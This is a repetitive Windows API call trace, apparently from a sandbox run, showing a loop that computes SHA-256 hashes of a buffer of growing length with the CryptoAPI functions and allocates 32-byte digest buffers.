	[0118.553] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0118.553] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.553] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc5e0
	[0118.553] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc5e0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc5e0, pdwDataLen=0x129364) returned 1
	[0118.553] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.553] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.553] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.553] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.553] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0118.553] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.554] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc608
	[0118.554] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc608, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc608, pdwDataLen=0x129364) returned 1
	[0118.554] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.554] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.554] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.554] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.554] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0118.554] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.554] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc630
	[0118.554] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc630, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc630, pdwDataLen=0x129364) returned 1
	[0118.554] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.554] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.554] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.555] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.555] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0118.555] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.555] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc658
	[0118.555] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc658, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc658, pdwDataLen=0x129364) returned 1
	[0118.555] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.555] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.555] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.555] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.555] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0118.555] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.555] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc680
	[0118.555] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc680, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc680, pdwDataLen=0x129364) returned 1
	[0118.555] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.555] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.555] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.556] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.556] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0118.556] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc6a8
	[0118.556] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc6a8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc6a8, pdwDataLen=0x129364) returned 1
	[0118.556] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.556] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.556] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.556] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.556] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0118.556] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.556] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc6d0
	[0118.556] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc6d0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc6d0, pdwDataLen=0x129364) returned 1
	[0118.556] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.556] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.557] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.557] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.557] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0118.557] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc6f8
	[0118.557] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc6f8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc6f8, pdwDataLen=0x129364) returned 1
	[0118.557] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.557] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.557] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.557] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.557] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0118.557] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc720
	[0118.557] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc720, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc720, pdwDataLen=0x129364) returned 1
	[0118.558] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.558] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.558] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.558] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.558] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0118.558] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.558] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc748
	[0118.558] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc748, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc748, pdwDataLen=0x129364) returned 1
	[0118.558] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.558] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.558] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.558] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.558] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0118.558] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.558] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc770
	[0118.558] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc770, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc770, pdwDataLen=0x129364) returned 1
	[0118.559] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.559] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.559] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.559] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.559] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0118.559] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.559] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc798
	[0118.559] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc798, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc798, pdwDataLen=0x129364) returned 1
	[0118.559] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.559] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.559] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.559] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.559] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0118.559] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.559] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc7c0
	[0118.560] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc7c0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc7c0, pdwDataLen=0x129364) returned 1
	[0118.560] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.560] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.560] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.560] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.560] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0118.560] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.560] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc7e8
	[0118.560] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc7e8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc7e8, pdwDataLen=0x129364) returned 1
	[0118.560] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.560] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.560] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.561] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.561] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0118.561] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.561] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc810
	[0118.561] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc810, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc810, pdwDataLen=0x129364) returned 1
	[0118.561] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.561] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.561] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.561] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.561] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0118.561] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.561] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc838
	[0118.561] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc838, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc838, pdwDataLen=0x129364) returned 1
	[0118.561] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.561] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.561] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.562] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.562] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0118.562] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.562] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc860
	[0118.562] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc860, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc860, pdwDataLen=0x129364) returned 1
	[0118.562] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.562] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.562] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.562] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.562] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0118.562] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.562] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc888
	[0118.562] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc888, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc888, pdwDataLen=0x129364) returned 1
	[0118.562] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.562] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.562] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.563] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.563] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0118.563] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.563] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc8b0
	[0118.563] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc8b0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc8b0, pdwDataLen=0x129364) returned 1
	[0118.563] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.563] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.563] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.563] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.563] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0118.563] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.563] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc8d8
	[0118.563] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc8d8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc8d8, pdwDataLen=0x129364) returned 1
	[0118.563] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.563] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.563] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.564] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.564] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0118.564] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.564] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc900
	[0118.564] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc900, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc900, pdwDataLen=0x129364) returned 1
	[0118.564] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.564] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.564] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.564] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.564] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0118.564] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.564] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc928
	[0118.564] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc928, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc928, pdwDataLen=0x129364) returned 1
	[0118.564] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.564] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.564] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.565] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.565] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0118.565] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.565] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc950
	[0118.565] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc950, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc950, pdwDataLen=0x129364) returned 1
	[0118.565] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.565] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.565] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.565] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.565] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0118.565] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.565] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc978
	[0118.565] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc978, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc978, pdwDataLen=0x129364) returned 1
	[0118.565] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.565] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.566] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.566] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.566] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0118.566] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc9a0
	[0118.566] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fc9a0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc9a0, pdwDataLen=0x129364) returned 1
	[0118.566] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.566] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.566] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.566] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.566] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0118.566] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fc9c8
	[0118.566] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fc9c8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fc9c8, pdwDataLen=0x129364) returned 1
	[0118.566] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.567] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.567] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
